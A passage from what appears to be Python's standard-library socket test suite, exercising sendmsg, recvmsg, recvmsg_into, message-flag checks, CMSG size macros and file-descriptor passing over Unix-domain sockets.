self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except TimeoutError:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("TimeoutError not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(TimeoutError,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
